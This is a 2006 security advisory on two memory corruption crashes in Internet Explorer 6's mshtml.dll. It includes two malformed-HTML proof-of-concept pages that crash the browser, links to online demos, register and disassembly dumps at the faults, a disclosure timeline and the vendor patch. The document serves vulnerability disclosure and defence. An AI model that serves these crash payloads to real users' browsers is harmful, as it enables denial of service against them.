-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

 ---------------------------------------------------
| BuHa Security-Advisory #13    |    May 25th, 2006 |
 ---------------------------------------------------
| Vendor   | MS Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Critical (Memory Corruption)           |
 ---------------------------------------------------

The Microsoft Security Response Center rated following issues as
critical because, on the face of it, they could produce an exploitable
memory corruption (see HTML Tag Memory Corruption Vulnerability -
CVE-2006-1188 [1]) with a variant of my PoC.

o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Memory Corruption Vulnerability: <mshtml.dll>#7d519030
=================================

Following HTML code forces IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
>      "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
> <html>  <fieldset>    <h4>
> <pre><td>
> <menu>
> <legend>
> <a>
> <ul>
> <small>
> <fieldset>
> <h6>
> </h6
> </u>
> </optgroup>
> </tr>
> </map>
> </ul
> </dfn>
>
> </del>
> </h2>
> </dir>
> </ul>

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html

These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000
> edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894
>
>         7d519012 55               push    ebp
>         7d519013 8bec             mov     ebp,esp
>         7d519015 8b4104           mov     eax,[ecx+0x4]
>         7d519018 394508           cmp     [ebp+0x8],eax
>         7d51901b 7c09             jl      mshtml+0x69026 (7d519026)
>         7d51901d 7edc             jle     mshtml+0x68ffb (7d518ffb)
>         7d51901f 33c0             xor     eax,eax
>         7d519021 40               inc     eax
>         7d519022 5d               pop     ebp
>         7d519023 c20800           ret     0x8
>         7d519026 83c8ff           or      eax,0xffffffff
>         7d519029 ebf7             jmp     mshtml+0x69022 (7d519022)
>         7d51902b 90               nop
>         7d51902c 90               nop
>         7d51902d 90               nop
>         7d51902e 90               nop
>         7d51902f 90               nop
> FAULT ->7d519030 8b4108           mov     eax,[ecx+0x8]
>                                           ds:0023:00000008=????????
>         7d519033 85c0             test    eax,eax
>         7d519035 7425             jz      mshtml+0x6905c (7d51905c)
>         7d519037 8b10             mov     edx,[eax]
>         7d519039 f6c210           test    dl,0x10
>         7d51903c 7408             jz      mshtml+0x69046 (7d519046)
>         7d51903e f6c220           test    dl,0x20
>         7d519041 7519             jnz     mshtml+0x6905c (7d51905c)
>         7d519043 8b400c           mov     eax,[eax+0xc]
>         7d519046 8b4808           mov     ecx,[eax+0x8]
>         7d519049 85c9             test    ecx,ecx

o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35
=================================

Following HTML code forces IE 6 to crash:
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/html4/loose.dtd">
> <bdo>
>     </span>
> <pre>
>
> <param>
> <form>
> <colgroup>
> <small>
> </small>
> </colgroup>
> </map>
> </button>
> </code
>
> <blockquote>
> <th>
> <small>
>
> </tbody>
> </tr>
> </ol>
> </tbody>
> </ol>
> </code>
> </strong>
>
>
> <head>
> <fieldset>
> <style>
>
> </style
> </dir>
> </a>
> </td
> </li>
> </label
> </object>
> </bdo
> </th
> </object
> </q>
>
> <ol>
> <object>

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html

These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0
> edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
>
>         7d529d0e e811170000       call    mshtml+0x7b424 (7d52b424)
>         7d529d13 85c0             test    eax,eax
>         7d529d15 0f85c5500800     jne     mshtml!DllGetClassObject+0x10fa2
>                                           (7d5aede0)
>         7d529d1b 0fb65508         movzx   edx,byte ptr [ebp+0x8]
>         7d529d1f 8d849680000000   lea     eax,[esi+edx*4+0x80]
>         7d529d26 5e               pop     esi
>         7d529d27 5d               pop     ebp
>         7d529d28 c20c00           ret     0xc
>         7d529d2b 90               nop
>         7d529d2c 90               nop
>         7d529d2d 90               nop
>         7d529d2e 90               nop
>         7d529d2f 90               nop
>         7d529d30 8bff             mov     edi,edi
>         7d529d32 55               push    ebp
>         7d529d33 8bec             mov     ebp,esp
> FAULT ->7d529d35 0fbe4114         movsx   eax,byte ptr [ecx+0x14]
>                                           ds:0023:00000014=??
>         7d529d39 c1e004           shl     eax,0x4
>         7d529d3c 0578aa4b7d       add     eax,0x7d4baa78
>         7d529d41 7410             jz      mshtml+0x79d53 (7d529d53)
>         7d529d43 8b400c           mov     eax,[eax+0xc]
>         7d529d46 234508           and     eax,[ebp+0x8]
>         7d529d49 f7d8             neg     eax
>         7d529d4b 1bc0             sbb     eax,eax
>         7d529d4d f7d8             neg     eax
>         7d529d4f 5d               pop     ebp
>         7d529d50 c20400           ret     0x4
>         7d529d53 33c0             xor     eax,eax
>         7d529d55 ebf8             jmp     mshtml+0x79d4f (7d529d4f)

o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
> MS IE 6 SP2 - Win XP Pro SP2
> MS IE 6     - Win 2k SP4

o Disclosure Timeline:
=====================

xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.

o Solution:
==========

Install the latest security update (MS06-013) for Internet Explorer [2].

o Credits:
=========

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-2.txt

[1] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188
[2] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: http://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEdjSQkCo6/ctnOpYRA9qlAJ9CfZxTO0qAs+6O12hmutZ6eeHoMwCghkd2
vrVBfqAxWpoJ9Ny1W8OAtEw=
=M5nj
-----END PGP SIGNATURE-----